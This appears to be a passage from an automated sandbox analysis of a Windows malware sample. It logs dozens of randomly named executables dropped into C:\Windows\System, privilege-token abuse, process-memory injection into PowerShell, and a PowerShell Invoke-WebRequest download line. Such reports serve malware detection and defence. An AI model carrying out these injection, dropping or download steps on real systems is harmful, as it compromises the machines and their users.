File created C:\Windows\System\UezRpFH.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\uhUZQTX.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\WgeOcgh.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\TVIwuIj.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\LGYzaFk.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\OZERGYn.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\SPsFhMv.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\uUFnbSo.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\oeRjPbO.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\sssQzVR.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\nzKOGtW.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\kDGVjMx.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\vKgjVWa.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\HmBAQPt.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\gLDqnCl.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\kXTdSdz.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\DcySGCV.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\IbjOjxU.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\pDgxkTM.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\cuBtvrJ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\awySKrD.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\kGdoCDu.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\yytkqwv.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\Dmkdikg.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\KrByvEA.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\ByiEqVC.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\wTgQmvp.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\NYRMzPk.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\XnEurkF.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\vieDMEp.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\sNfJzby.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\FmWRVZd.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\qChtXuq.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\ZxcXKtW.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\AyOeinR.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\XspZSkq.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\FMdTFDt.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\HqgmXcI.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\fZnxCrj.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\XJiYgTw.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\lOLtVEf.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\wAylbBF.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\qyNMbwD.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\dPtiGki.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\OaTxzFC.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\sSLfbLf.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\iNpbaca.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\DppQRor.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\dCmGTEZ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\AhnYvrx.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\zQMnacp.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\mfYXpHb.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\uuzWwCv.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\tfowSKJ.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\vSTMbVj.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\rbTHPCm.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\LeHukoq.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\pbvbrRC.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\swAxAnf.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\anEKQlL.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\JnmEnrw.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\EbMptOH.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\eobxNRg.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
File created C:\Windows\System\YQKcUMl.exe C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\eZThTBy.exe
PID 2244 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\eZThTBy.exe
PID 2244 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\eZThTBy.exe
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\zBPTMiJ.exe
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\zBPTMiJ.exe
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\zBPTMiJ.exe
PID 2244 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\jBUuSRA.exe
PID 2244 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\jBUuSRA.exe
PID 2244 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\jBUuSRA.exe
PID 2244 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OpfSKTR.exe
PID 2244 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OpfSKTR.exe
PID 2244 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OpfSKTR.exe
PID 2244 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AJPwSyP.exe
PID 2244 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AJPwSyP.exe
PID 2244 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AJPwSyP.exe
PID 2244 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\iXMMciz.exe
PID 2244 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\iXMMciz.exe
PID 2244 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\iXMMciz.exe
PID 2244 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\LkRkWcr.exe
PID 2244 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\LkRkWcr.exe
PID 2244 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\LkRkWcr.exe
PID 2244 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ImfhaFt.exe
PID 2244 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ImfhaFt.exe
PID 2244 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ImfhaFt.exe
PID 2244 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\tVupfkN.exe
PID 2244 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\tVupfkN.exe
PID 2244 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\tVupfkN.exe
PID 2244 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OkQwduK.exe
PID 2244 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OkQwduK.exe
PID 2244 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OkQwduK.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\PdFHizp.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\PdFHizp.exe
PID 2244 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\PdFHizp.exe
PID 2244 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\rXYXQKy.exe
PID 2244 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\rXYXQKy.exe
PID 2244 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\rXYXQKy.exe
PID 2244 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OSkSPdP.exe
PID 2244 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OSkSPdP.exe
PID 2244 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\OSkSPdP.exe
PID 2244 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\qJPJUXy.exe
PID 2244 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\qJPJUXy.exe
PID 2244 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\qJPJUXy.exe
PID 2244 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\sYhwsPW.exe
PID 2244 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\sYhwsPW.exe
PID 2244 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\sYhwsPW.exe
PID 2244 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ouTLVBD.exe
PID 2244 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ouTLVBD.exe
PID 2244 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\ouTLVBD.exe
PID 2244 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\wwpCdve.exe
PID 2244 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\wwpCdve.exe
PID 2244 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\wwpCdve.exe
PID 2244 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\FBKbFDT.exe
PID 2244 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\FBKbFDT.exe
PID 2244 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\FBKbFDT.exe
PID 2244 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\nLMMjoV.exe
PID 2244 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\nLMMjoV.exe
PID 2244 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\nLMMjoV.exe
PID 2244 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AmFXOMk.exe
PID 2244 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AmFXOMk.exe
PID 2244 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AmFXOMk.exe
PID 2244 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\QdVDdIn.exe

Processes

C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\eZThTBy.exe

C:\Windows\System\eZThTBy.exe

C:\Windows\System\zBPTMiJ.exe

C:\Windows\System\zBPTMiJ.exe

C:\Windows\System\jBUuSRA.exe

C:\Windows\System\jBUuSRA.exe

C:\Windows\System\OpfSKTR.exe

C:\Windows\System\OpfSKTR.exe

C:\Windows\System\AJPwSyP.exe

C:\Windows\System\AJPwSyP.exe

C:\Windows\System\iXMMciz.exe

C:\Windows\System\iXMMciz.exe

C:\Windows\System\LkRkWcr.exe

C:\Windows\System\LkRkWcr.exe

C:\Windows\System\ImfhaFt.exe

C:\Windows\System\ImfhaFt.exe

C:\Windows\System\tVupfkN.exe

C:\Windows\System\tVupfkN.exe

C:\Windows\System\OkQwduK.exe

C:\Windows\System\OkQwduK.exe

C:\Windows\System\PdFHizp.exe

C:\Windows\System\PdFHizp.exe

C:\Windows\System\rXYXQKy.exe

C:\Windows\System\rXYXQKy.exe

C:\Windows\System\OSkSPdP.exe

C:\Windows\System\OSkSPdP.exe

C:\Windows\System\qJPJUXy.exe

C:\Windows\System\qJPJUXy.exe

C:\Windows\System\sYhwsPW.exe

C:\Windows\System\sYhwsPW.exe

C:\Windows\System\ouTLVBD.exe

C:\Windows\System\ouTLVBD.exe

C:\Windows\System\wwpCdve.exe

C:\Windows\System\wwpCdve.exe

C:\Windows\System\FBKbFDT.exe

C:\Windows\System\FBKbFDT.exe

C:\Windows\System\nLMMjoV.exe

C:\Windows\System\nLMMjoV.exe

C:\Windows\System\AmFXOMk.exe

C:\Windows\System\AmFXOMk.exe

C:\Windows\System\QdVDdIn.exe

C:\Windows\System\QdVDdIn.exe

C:\Windows\System\bzyBHJR.exe

C:\Windows\System\bzyBHJR.exe

C:\Windows\System\WgeOcgh.exe

C:\Windows\System\WgeOcgh.exe

C:\Windows\System\JrCUfdI.exe

C:\Windows\System\JrCUfdI.exe

C:\Windows\System\IXklvfC.exe

C:\Windows\System\IXklvfC.exe

C:\Windows\System\imAyrQb.exe

C:\Windows\System\imAyrQb.exe

C:\Windows\System\SXvjWvM.exe

C:\Windows\System\SXvjWvM.exe

C:\Windows\System\UreVSiU.exe

C:\Windows\System\UreVSiU.exe

C:\Windows\System\qPdURaF.exe

C:\Windows\System\qPdURaF.exe

C:\Windows\System\NgwLvXs.exe

C:\Windows\System\NgwLvXs.exe

C:\Windows\System\goFxpPs.exe

C:\Windows\System\goFxpPs.exe

C:\Windows\System\gqsfWtv.exe

C:\Windows\System\gqsfWtv.exe

C:\Windows\System\IFRfvxo.exe

C:\Windows\System\IFRfvxo.exe

C:\Windows\System\DWTStiY.exe

C:\Windows\System\DWTStiY.exe

C:\Windows\System\yGNKmwX.exe

C:\Windows\System\yGNKmwX.exe

C:\Windows\System\PjaPEBj.exe

C:\Windows\System\PjaPEBj.exe

C:\Windows\System\FHPtHCk.exe

C:\Windows\System\FHPtHCk.exe

C:\Windows\System\pASQJEP.exe

C:\Windows\System\pASQJEP.exe

C:\Windows\System\mfYXpHb.exe

C:\Windows\System\mfYXpHb.exe

C:\Windows\System\XdDHhSm.exe

C:\Windows\System\XdDHhSm.exe

C:\Windows\System\wQupyhZ.exe

C:\Windows\System\wQupyhZ.exe

C:\Windows\System\kOSwDeD.exe

C:\Windows\System\kOSwDeD.exe

C:\Windows\System\ndOYDrg.exe

C:\Windows\System\ndOYDrg.exe

C:\Windows\System\QPTweWK.exe

C:\Windows\System\QPTweWK.exe

C:\Windows\System\GTEYUHW.exe

C:\Windows\System\GTEYUHW.exe

C:\Windows\System\lTVyBPQ.exe

C:\Windows\System\lTVyBPQ.exe

C:\Windows\System\ZYQnmJe.exe

C:\Windows\System\ZYQnmJe.exe

C:\Windows\System\pkaSjjA.exe

C:\Windows\System\pkaSjjA.exe

C:\Windows\System\ziNWgPX.exe

C:\Windows\System\ziNWgPX.exe

C:\Windows\System\gTRZBFb.exe

C:\Windows\System\gTRZBFb.exe

C:\Windows\System\fSNZGSq.exe

C:\Windows\System\fSNZGSq.exe

C:\Windows\System\ujbhZsD.exe

C:\Windows\System\ujbhZsD.exe

C:\Windows\System\wJAkQZQ.exe

C:\Windows\System\wJAkQZQ.exe

C:\Windows\System\vypYJkI.exe

C:\Windows\System\vypYJkI.exe

C:\Windows\System\GUrCsek.exe

C:\Windows\System\GUrCsek.exe

C:\Windows\System\APlJJsl.exe

C:\Windows\System\APlJJsl.exe

C:\Windows\System\CRAINsH.exe

C:\Windows\System\CRAINsH.exe

C:\Windows\System\HhHhzCi.exe

C:\Windows\System\HhHhzCi.exe

C:\Windows\System\McOUhml.exe

C:\Windows\System\McOUhml.exe

C:\Windows\System\txapjwp.exe

C:\Windows\System\txapjwp.exe

C:\Windows\System\xIchOHM.exe

C:\Windows\System\xIchOHM.exe

C:\Windows\System\tuthUnK.exe

C:\Windows\System\tuthUnK.exe

C:\Windows\System\qfWyuYr.exe

C:\Windows\System\qfWyuYr.exe

C:\Windows\System\YPZzqMo.exe

C:\Windows\System\YPZzqMo.exe

C:\Windows\System\pWUvLrk.exe

C:\Windows\System\pWUvLrk.exe

C:\Windows\System\CxtIGwN.exe

C:\Windows\System\CxtIGwN.exe

C:\Windows\System\aBZigJA.exe

C:\Windows\System\aBZigJA.exe

C:\Windows\System\yDpAbNp.exe

C:\Windows\System\yDpAbNp.exe

C:\Windows\System\RuBcXUJ.exe

C:\Windows\System\RuBcXUJ.exe

C:\Windows\System\DigrMYy.exe

C:\Windows\System\DigrMYy.exe

C:\Windows\System\jGaKNek.exe

C:\Windows\System\jGaKNek.exe

C:\Windows\System\tQFFdaj.exe

C:\Windows\System\tQFFdaj.exe

C:\Windows\System\WaEdMUd.exe

C:\Windows\System\WaEdMUd.exe

C:\Windows\System\dLoMGVN.exe

C:\Windows\System\dLoMGVN.exe

C:\Windows\System\ShOYjBf.exe

C:\Windows\System\ShOYjBf.exe

C:\Windows\System\QGGmFQg.exe

C:\Windows\System\QGGmFQg.exe

C:\Windows\System\SlnBlYu.exe

